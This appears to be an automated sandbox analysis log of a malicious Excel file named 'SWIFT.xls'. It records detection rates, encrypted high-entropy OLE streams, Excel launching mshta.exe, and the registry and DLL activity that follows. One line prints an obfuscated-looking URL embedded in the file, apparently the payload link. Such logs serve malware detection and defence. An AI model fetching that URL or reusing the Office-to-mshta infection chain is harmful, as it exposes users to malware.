Source: 06331000.0.drStream path 'MBD006D439F/\x1Ole' : https://s.deemos.com/lqSa1Aoh?&linen=frightened&trumpetw1h_xA=cAqHv.uzUqGJGExMrwr0C189bJ8UxUrTSRsvVXoyB6u2P8khUsj3kZjszVQATKdfwBGnCZ97z8Zc264Ud6YN6Z0LbeNJy3iAuOTvym2XXgObYQbDZLezhLoVDJCW9M6N4jk6UdrSdj9DqFB6c3dVBMuggpH8HEZBLT8mGhsKLsKAn8obIIdPxMDiR6wZalIppgtRVhZB6QmMwlTiU2M595Vlpnbd3_\oV8'GV5
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal76.expl.winXLS@21/46@4/3
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\794F9615.emfJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{333D789C-712C-4FA7-9D95-BDF17FB34A92} - OProcSessId.datJump to behavior
Source: SWIFT.xlsOLE indicator, Workbook stream: true
Source: 06331000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: SWIFT.xlsVirustotal: Detection: 22%
Source: SWIFT.xlsReversingLabs: Detection: 26%
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" -Embedding
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/24.4.20272 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\UserData" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1656,i,13889243780433033577,2117766799754663764,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\SWIFT.xls"
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/24.4.20272 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\UserData" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1656,i,13889243780433033577,2117766799754663764,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: c2r64.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: SWIFT.xlsInitial sample: OLE indicators vbamacros = False
Source: SWIFT.xlsInitial sample: OLE indicators encrypted = True
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: SWIFT.xlsStream path 'MBD006D439E/MBD006D2A09/MBD00049180/CONTENTS' entropy: 7.9671168067 (max. 8.0)
Source: SWIFT.xlsStream path 'MBD006D439E/MBD006D2A09/Workbook' entropy: 7.98367556288 (max. 8.0)
Source: SWIFT.xlsStream path 'Workbook' entropy: 7.99809337537 (max. 8.0)
Source: 06331000.0.drStream path 'MBD006D439E/MBD006D2A09/MBD00049180/CONTENTS' entropy: 7.9671168067 (max. 8.0)
Source: 06331000.0.drStream path 'MBD006D439E/MBD006D2A09/Workbook' entropy: 7.98367556288 (max. 8.0)
Source: 06331000.0.drStream path 'Workbook' entropy: 7.99799859242 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 696Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
